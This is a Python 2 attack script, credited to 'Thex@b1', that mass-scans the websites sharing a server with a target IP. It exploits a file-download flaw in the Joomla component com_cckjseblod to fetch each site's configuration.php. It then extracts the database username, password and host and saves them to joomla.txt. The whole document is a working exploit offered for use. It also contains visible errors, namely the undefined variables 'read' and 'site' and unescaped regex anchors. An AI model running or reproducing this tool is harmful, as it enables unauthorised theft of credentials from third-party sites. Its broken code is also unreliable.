Script Vulnerability (com_cckjseblod)/ Scan Server /

1. #!/usr/bin/python
2.  
3. import urllib,urllib2,os,sys,re
4. import json
5. import urlparse
6.  
7.  
8. filename    = sys.argv[0].split('\\')[-1] if os.name == 'nt' else sys.argv[0].split('/')[-1]
9.  
10. def usage() :
11.     print ' Coded By Thex@b1 (Usage : %s < ip | hostname | url >)' % filename
12.      
13. def getdata(remoteaddr) :
14.     try :
15.         url     = 'http://domains.yougetsignal.com/domains.php'
16.         req     = urllib2.Request(url)
17.  
18.         req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0')
19.         req.add_header('X-Requested-With','XMLHttpRequest')
20.         req.add_header('X-Prototype-Version','1.6.0')
21.         req.add_header('Referer','http://www.yougetsignal.com/tools/web-sites-on-web-server/')
22.         req.add_header('Origin','http://www.yougetsignal.com')
23.  
24.         params  = {"Key":"","remoteAddress": remoteaddr}
25.         query   = urllib.urlencode(params)
26.         resp    = urllib2.urlopen(req, query)
27.         result  = resp.read()
28.         data    = json.loads(result)
29.         return data
30.     except Exception as exp :
31.         print exp
32.         sys.exit(0)
33.          
34. def getdomains(data) :
35.     try :
36.         if data['status'] == 'Success' :
37.             domains = []
38.             for domain,info in data['domainArray'] :
39.                 domains.append(domain)
40.             return domains
41.         elif data['status'] == 'Fail' :
42.             return []
43.         else :
44.             return []
45.     except Exception as ex :
46.         print ex
47.         sys.exit(0)
48.  
49. def main() :
50.     if len(sys.argv) != 2 :
51.         usage()
52.         sys.exit(0)
53.  
54.     ip = sys.argv[1]
55.     if ip.startswith('http://') or ip.startswith('https://') :
56.         parsedurl = urlparse.urlparse(ip)
57.         ip = parsedurl.hostname
58.      
59.     data = getdata(ip)
60.     if data['status'] == 'Fail' :
61.         print '[-] '+data['message']
62.         sys.exit(0)
63.     for url in getdomains(data) :
64.      try:
65.        uop = urllib2.urlopen('http://'+url+'/index.php?option=com_cckjseblod&task=download&file=configuration.php').read()
66.        print 'testing'+ url
67.        if "JConfig" in uop:
68.             print "[+][vuln] ==========>"+url+"/index.php?option=com_cckjseblod&task=download&file=configuration.php"
69.             user = re.search("\('$user',*'(.*?)' *\)",uop).group(1)
70.             print '[+] DB_user' +user
71.             pwd = re.search("\('$password', *'(.*?)' *\)",read).group(1)
72.             print '[+] DB_PASSWORD :'+pwd
73.             host = re.search("\('$db', *'(.*?)' *\)",read).group(1)
74.             print '[+] DB_HOST :'+host
75.             w = open('joomla.txt','a')
76.             w.write("http://"+site+"\nDB_USER:"+user+"\nDB_PASSWORD :"+pwd+"\nDB_HOST :"+host+"\n")
77.        else :
78.             print "not vuln"
79.      except Exception as ex:
80.             print url+" not vuln"
81.        
82.            
83.        
84. if __name__ == '__main__' : main()